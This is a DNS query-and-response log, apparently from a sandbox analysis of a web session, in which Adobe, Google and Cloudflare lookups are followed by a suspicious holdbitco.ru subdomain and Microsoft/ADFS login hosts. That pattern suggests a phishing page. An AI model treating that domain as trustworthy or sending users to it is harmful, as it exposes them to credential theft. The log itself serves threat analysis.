                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.015496016 CEST192.168.2.161.1.1.10x606fStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.015702963 CEST192.168.2.161.1.1.10x9a4Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747064114 CEST192.168.2.161.1.1.10x1feStandard query (0)p.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747705936 CEST192.168.2.161.1.1.10x1e29Standard query (0)p.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.481472015 CEST192.168.2.161.1.1.10xcdc3Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.482033014 CEST192.168.2.161.1.1.10x3d7dStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.746041059 CEST192.168.2.161.1.1.10xb5a3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.746659040 CEST192.168.2.161.1.1.10x4292Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.416014910 CEST192.168.2.161.1.1.10x9503Standard query (0)js-agent.newrelic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.416217089 CEST192.168.2.161.1.1.10x6a04Standard query (0)js-agent.newrelic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.016927004 CEST192.168.2.161.1.1.10x633bStandard query (0)bam-cell.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.017357111 CEST192.168.2.161.1.1.10x38a8Standard query (0)bam-cell.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.118546009 CEST192.168.2.161.1.1.10x29e6Standard query (0)bam-cell.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.118925095 CEST192.168.2.161.1.1.10x920aStandard query (0)bam-cell.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:35.736968994 CEST192.168.2.161.1.1.10x8ba6Standard query (0)yxmaiypmfuyt.holdbitco.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:35.737236977 CEST192.168.2.161.1.1.10xd541Standard query (0)yxmaiypmfuyt.holdbitco.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.229284048 CEST192.168.2.161.1.1.10xbebStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.229610920 CEST192.168.2.161.1.1.10x47baStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.230222940 CEST192.168.2.161.1.1.10x6a56Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.230446100 CEST192.168.2.161.1.1.10xa3a2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.022686005 CEST192.168.2.161.1.1.10xbff9Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.022975922 CEST192.168.2.161.1.1.10x2de0Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.261848927 CEST192.168.2.161.1.1.10xda93Standard query (0)yxmaiypmfuyt.holdbitco.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.262301922 CEST192.168.2.161.1.1.10x954bStandard query (0)yxmaiypmfuyt.holdbitco.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.683001995 CEST192.168.2.161.1.1.10x6ad3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.683296919 CEST192.168.2.161.1.1.10x3cb1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.157977104 CEST192.168.2.161.1.1.10x24b1Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.158207893 CEST192.168.2.161.1.1.10x3f5fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.747625113 CEST192.168.2.161.1.1.10x13a3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.747873068 CEST192.168.2.161.1.1.10x24a3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.093729973 CEST192.168.2.161.1.1.10xfa61Standard query (0)bam-cell.nr-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.093930006 CEST192.168.2.161.1.1.10x1308Standard query (0)bam-cell.nr-data.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.830554008 CEST192.168.2.161.1.1.10x4e79Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.830974102 CEST192.168.2.161.1.1.10x152aStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.744447947 CEST192.168.2.161.1.1.10xf685Standard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.744891882 CEST192.168.2.161.1.1.10x470dStandard query (0)clients1.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.037513018 CEST192.168.2.161.1.1.10xb0eeStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.037513018 CEST192.168.2.161.1.1.10x5525Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.038707018 CEST192.168.2.161.1.1.10x4a00Standard query (0)adfs.heart.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.038707018 CEST192.168.2.161.1.1.10x8d7aStandard query (0)adfs.heart.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.616667032 CEST192.168.2.161.1.1.10xa548Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.616791010 CEST192.168.2.161.1.1.10x19a4Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.731944084 CEST192.168.2.161.1.1.10x5373Standard query (0)adfs.heart.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.732014894 CEST192.168.2.161.1.1.10x549fStandard query (0)adfs.heart.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542383909 CEST1.1.1.1192.168.2.160x451cNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients.l.google.com172.253.62.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients.l.google.com172.253.62.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients.l.google.com172.253.62.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients.l.google.com172.253.62.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients.l.google.com172.253.62.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST1.1.1.1192.168.2.160xc8dcNo error (0)clients.l.google.com172.253.62.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542892933 CEST1.1.1.1192.168.2.160x6f7dNo error (0)accounts.google.com172.253.63.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.106615067 CEST1.1.1.1192.168.2.160xb5f5No error (0)prod.adobeccstatic.com99.86.229.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.106615067 CEST1.1.1.1192.168.2.160xb5f5No error (0)prod.adobeccstatic.com99.86.229.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.106615067 CEST1.1.1.1192.168.2.160xb5f5No error (0)prod.adobeccstatic.com99.86.229.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.106615067 CEST1.1.1.1192.168.2.160xb5f5No error (0)prod.adobeccstatic.com99.86.229.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.107496023 CEST1.1.1.1192.168.2.160x3f2fNo error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108042002 CEST1.1.1.1192.168.2.160x6843No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108711958 CEST1.1.1.1192.168.2.160xbec0No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108711958 CEST1.1.1.1192.168.2.160xbec0No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108781099 CEST1.1.1.1192.168.2.160x4fe9No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.109360933 CEST1.1.1.1192.168.2.160x9a4No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.109972000 CEST1.1.1.1192.168.2.160x606fNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.841078043 CEST1.1.1.1192.168.2.160x1feNo error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.841094017 CEST1.1.1.1192.168.2.160x1e29No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.575298071 CEST1.1.1.1192.168.2.160xcdc3No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.575298071 CEST1.1.1.1192.168.2.160xcdc3No error (0)scontent.xx.fbcdn.net157.240.229.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.576030970 CEST1.1.1.1192.168.2.160x3d7dNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.108422041 CEST1.1.1.1192.168.2.160x5401No error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.213306904 CEST1.1.1.1192.168.2.160x2e0dNo error (0)adobe.com.ssl.d1.sc.omtrdc.net63.140.38.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST1.1.1.1192.168.2.160xb5a3No error (0)www.google.com172.253.122.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST1.1.1.1192.168.2.160xb5a3No error (0)www.google.com172.253.122.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST1.1.1.1192.168.2.160xb5a3No error (0)www.google.com172.253.122.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST1.1.1.1192.168.2.160xb5a3No error (0)www.google.com172.253.122.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST1.1.1.1192.168.2.160xb5a3No error (0)www.google.com172.253.122.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST1.1.1.1192.168.2.160xb5a3No error (0)www.google.com172.253.122.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840672016 CEST1.1.1.1192.168.2.160x4292No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.510235071 CEST1.1.1.1192.168.2.160x9503No error (0)js-agent.newrelic.comk.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.510859966 CEST1.1.1.1192.168.2.160x6a04No error (0)js-agent.newrelic.comk.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.110691071 CEST1.1.1.1192.168.2.160x633bNo error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.110691071 CEST1.1.1.1192.168.2.160x633bNo error (0)bam-cell.cell.nr-data.nettls12.newrelic.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.111236095 CEST1.1.1.1192.168.2.160x38a8No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.111236095 CEST1.1.1.1192.168.2.160x38a8No error (0)bam-cell.cell.nr-data.netfastly-tls12-bam-cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.214699030 CEST1.1.1.1192.168.2.160x920aNo error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.214699030 CEST1.1.1.1192.168.2.160x920aNo error (0)bam-cell.cell.nr-data.netfastly-tls12-bam-cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.214732885 CEST1.1.1.1192.168.2.160x29e6No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.214732885 CEST1.1.1.1192.168.2.160x29e6No error (0)bam-cell.cell.nr-data.nettls12.newrelic.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:36.084105968 CEST1.1.1.1192.168.2.160xd541No error (0)yxmaiypmfuyt.holdbitco.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:36.126713037 CEST1.1.1.1192.168.2.160x8ba6No error (0)yxmaiypmfuyt.holdbitco.ru104.21.0.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:36.126713037 CEST1.1.1.1192.168.2.160x8ba6No error (0)yxmaiypmfuyt.holdbitco.ru172.67.150.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.323962927 CEST1.1.1.1192.168.2.160x6a56No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.323962927 CEST1.1.1.1192.168.2.160x6a56No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324616909 CEST1.1.1.1192.168.2.160xa3a2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324940920 CEST1.1.1.1192.168.2.160xbebNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324940920 CEST1.1.1.1192.168.2.160xbebNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324940920 CEST1.1.1.1192.168.2.160xbebNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324940920 CEST1.1.1.1192.168.2.160xbebNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.116947889 CEST1.1.1.1192.168.2.160xbff9No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.116947889 CEST1.1.1.1192.168.2.160xbff9No error (0)d2vgu95hoyrpkh.cloudfront.net3.162.103.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.116947889 CEST1.1.1.1192.168.2.160xbff9No error (0)d2vgu95hoyrpkh.cloudfront.net3.162.103.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.116947889 CEST1.1.1.1192.168.2.160xbff9No error (0)d2vgu95hoyrpkh.cloudfront.net3.162.103.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.116947889 CEST1.1.1.1192.168.2.160xbff9No error (0)d2vgu95hoyrpkh.cloudfront.net3.162.103.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.117445946 CEST1.1.1.1192.168.2.160x2de0No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.666469097 CEST1.1.1.1192.168.2.160xda93No error (0)yxmaiypmfuyt.holdbitco.ru104.21.0.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.666469097 CEST1.1.1.1192.168.2.160xda93No error (0)yxmaiypmfuyt.holdbitco.ru172.67.150.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.708415031 CEST1.1.1.1192.168.2.160x954bNo error (0)yxmaiypmfuyt.holdbitco.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.776552916 CEST1.1.1.1192.168.2.160x6ad3No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.776552916 CEST1.1.1.1192.168.2.160x6ad3No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.777481079 CEST1.1.1.1192.168.2.160x3cb1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.251642942 CEST1.1.1.1192.168.2.160x24b1No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.841551065 CEST1.1.1.1192.168.2.160x13a3No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.841551065 CEST1.1.1.1192.168.2.160x13a3No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.841824055 CEST1.1.1.1192.168.2.160x24a3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187495947 CEST1.1.1.1192.168.2.160xfa61No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187495947 CEST1.1.1.1192.168.2.160xfa61No error (0)bam-cell.cell.nr-data.netfastly-tls12-bam-cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187495947 CEST1.1.1.1192.168.2.160xfa61No error (0)fastly-tls12-bam-cell.nr-data.net162.247.243.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187583923 CEST1.1.1.1192.168.2.160x1308No error (0)bam-cell.nr-data.netbam-cell.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187583923 CEST1.1.1.1192.168.2.160x1308No error (0)bam-cell.cell.nr-data.nettls12.newrelic.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.924148083 CEST1.1.1.1192.168.2.160x4e79No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.924148083 CEST1.1.1.1192.168.2.160x4e79No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.924994946 CEST1.1.1.1192.168.2.160x152aNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients.l.google.com172.253.122.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients.l.google.com172.253.122.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients.l.google.com172.253.122.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients.l.google.com172.253.122.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients.l.google.com172.253.122.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST1.1.1.1192.168.2.160xf685No error (0)clients.l.google.com172.253.122.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838663101 CEST1.1.1.1192.168.2.160x470dNo error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
